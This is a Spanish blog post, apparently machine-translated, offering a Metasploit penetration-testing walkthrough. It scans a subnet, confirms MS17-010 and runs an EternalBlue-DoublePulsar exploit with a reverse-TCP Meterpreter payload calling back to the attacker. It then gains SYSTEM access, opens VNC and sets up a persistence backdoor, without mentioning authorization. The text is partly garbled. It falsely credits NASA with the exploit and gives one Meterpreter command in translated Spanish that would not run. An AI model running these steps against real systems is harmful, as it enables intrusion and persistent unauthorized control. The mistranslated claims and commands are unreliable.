Metasploit tutorial

 Thank to: https://es.linux-console.net/

Como hemos discutido las MEJORES 25 MEJORES HERRAMIENTA KALI LINUX, y pusimos METASPLOIT al principio en la lista, ahora discutamos y aprendamos sobre METASPLOIT. Le recomendamos que esté familiarizado con Metasploit.

Metasploit fue creado inicialmente por H. D Moore en 2003, hasta que Rapid7 lo adquirió y lo desarrolló aún más el 21 de octubre de 2009. Metasploit-framework está completamente escrito usando Ruby, y es un paquete estándar instalado en el sistema Kali Linux (y también en casi todos Penetration Testing OS, supongo). Es un kit favorito de piratas informáticos o probadores de penetración para investigar vulnerabilidades de seguridad, desarrollar y ejecutar exploits en objetivos y otros desarrollos de seguridad.

Metasploit viene con varias ediciones, generalmente divididas en dos categorías, versión gratuita y versión paga. Las versiones gratuitas: Metasploit Framework Community Edition (interfaz basada en CLI) y Armitage (interfaz basada en GUI). Las versiones pagas: Metasploit Express, Metasploit Pro y Cobalt Strike (es similar a Armitage, proporcionado por Strategic Cyber LLC).

Metasploit permite a los usuarios crear (o desarrollar) su propio código de explotación, pero no se preocupe si no sabe codificar, Metasploit tiene muchos módulos y se actualizan continuamente. Actualmente Metasploit tiene más de 1600 exploits y 500 payloads. La forma simple de entender qué son los exploits y las cargas útiles, una explotación es básicamente cómo el atacante entrega la carga útil, a través del agujero de vulnerabilidad del sistema de destino. Una vez que el atacante lanza el exploit que contiene una carga útil contra el objetivo vulnerable, luego se despliega la carga útil (la carga útil utilizada para volver a conectarse con el atacante para obtener acceso remoto contra el sistema de destino), en esta etapa, el exploit se realiza y se vuelve irrelevante.

 “Metasploit no es una herramienta instantánea de hackeo, es un framework demente”

Este artículo de Metasploit trata sobre la realización de pruebas de penetración contra un sistema de destino utilizando el siguiente flujo:

  • Escaneo de vulnerabilidades

  • Evaluación de vulnerabilidad

  • explotando

  • Obtener acceso remoto: poseer el sistema

PREPARACIÓN

Asegúrese de que nuestro Kali Linux tenga la última versión actualizada. Habrá mejoras dentro de cada actualización. Ejecute los siguientes comandos:

~# apt update
~# apt upgrade -y
~# apt dist-upgrade -y

Una vez que nuestra máquina esté actualizada, ahora comencemos activando la consola de metasploit. En la terminal, escriba:

~# msfconsole

Y también necesita cualquier editor de texto, Gedit o Leafpad, para recopilar información en el camino antes de compilar el ataque. En primer lugar, identifique su dirección IP de la interfaz inalámbrica, la IP del enrutador y la máscara de red.

Según la información anterior, anotamos la WLAN1 y la dirección IP del enrutador, y la máscara de red. Entonces, la nota debería verse así:

IP del atacante (LHOST): 192.168.1.56 IP de la puerta de enlace/enrutador: 192.168.1.1 Máscara de red: 255.255.255.0(/24)

PASO 1: ANÁLISIS DE VULNERABILIDAD

En la consola de metasploit, primero recopilamos información, como la dirección IP de destino, el sistema operativo, los puertos abiertos y la vulnerabilidad. Metasploit nos permite ejecutar NMap directamente desde la consola. Según la información anterior, ejecute este comando para realizar nuestra tarea de recopilación de información.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

Del comando anterior obtuvimos el resultado a continuación.

Tenemos un objetivo vulnerable que ejecuta el sistema operativo Windows, y el vulnerable está en el servicio SMBv1. Entonces, agregue a la nota.

IP objetivo (RHOST):  192.168.1.57 Vulnerabilidad: vulnerabilidad de ejecución remota de código en servidores Microsoft SMBv1 (ms17-010)

PASO 2: EVALUACIÓN DE LA VULNERABILIDAD

Ahora conocemos el objetivo y su vulnerabilidad. Comprobemos la vulnerabilidad en la consola de metasploit.

Ahora conocemos el objetivo y su vulnerabilidad. Comprobemos la vulnerabilidad en la consola de metasploit usando el módulo auxiliar smb_scanner. Ejecute el siguiente comando:

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS [target IP]
msf auxiliary(smb_ms17_010) > run

Metasploit confía en la vulnerabilidad y muestra la edición exacta del sistema operativo Windows. Agregar a la nota:

Sistema operativo de destino: Windows 7 Ultimate 7600

PASO 3: EXPLOTACIÓN

Desafortunadamente, metasploit no tiene un módulo de explotación relacionado con esta vulnerabilidad. Pero no se preocupe, hay un tipo afuera expuesto y escribió el código de explotación. El exploit es familiar, ya que lo inició la NASA y se llama EternalBlue-DoublePulsar. Puede obtenerlo desde aquí, o puede seguir la guía del video tutorial a continuación para instalar el código de explotación en su marco de metasploit.

Una vez que haya seguido la guía anterior, (asegúrese de que la ruta sea la misma que la del tutorial). Ahora, estás listo para explotar el objetivo. Ejecute los siguientes comandos:

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56

Explotar

Boom... El exploit tuvo éxito, obtuvimos una sesión de meterpreter. Como mencioné anteriormente, una vez que se lanzó el exploit, desplegará la carga útil, que es, aquí usamos, windows/meterpreter/reverse_tcp.

PASO 4: OBTENER ACCESO REMOTO

Exploremos los comandos más disponibles, ingrese '?' (sin signo de interrogación) y vea los comandos disponibles enumerados. Los comandos del sistema Stdapi son:

Para ver más información sobre el sistema de destino, use el comando 'sysinfo'. La salida debería verse así.

Dado que inyectamos en el proceso del sistema anteriormente (spoolsv.exe), obtuvimos System Privilege. Somos dueños del objetivo. Podemos hacer mucho con el comando al objetivo. Por ejemplo, podríamos ejecutar RDP o simplemente configurar el control remoto VNC. Para ejecutar el servicio VNC ingrese el comando:

~# run vnc

El resultado debería ser el escritorio de la máquina de destino, se ve así.

La parte más importante es crear una puerta trasera, de modo que cada vez que el objetivo se desconecte de nuestra máquina, la máquina objetivo intentará volver a conectarse con nosotros. La puerta trasera se usa para mantener el acceso, es como pescar, no arrojarás el pez al agua una vez que lo hayas conseguido, ¿verdad? Quiere hacer algo con el pescado, ya sea guardarlo en el refrigerador para otras acciones, como cocinarlo o venderlo por dinero.

Meterpreter tiene esta función persistente de puerta trasera. Ejecute el siguiente comando y eche un vistazo a los parámetros y argumentos disponibles.

meterpreter > ejecutar persistencia -h

Si no se siente cómodo con este script obsoleto, el módulo de persistencia más nuevo se encuentra en post/windows/manage/persistence_exe. Puedes explorarlo más por ti mismo.

Metasploit es enorme, no es solo una herramienta, es un marco, considere que tiene más de 1600 exploits y alrededor de 500 payloads. Un artículo es adecuado para el panorama general del uso general o la idea. Pero, has aprendido mucho de este artículo.

“Cuanto más sigues el flujo de ataque, más desafío tienes sin esfuerzo. ”

Comentarios

Entradas populares de este blog

Guía de herramientas básicas para estudiantes: 31 apps y webs imprescindibles para ayudarte con los estudios

Comando FOR para archivos BAT

Policy Based Routing example: route one subnet via ISP A and another via ISP B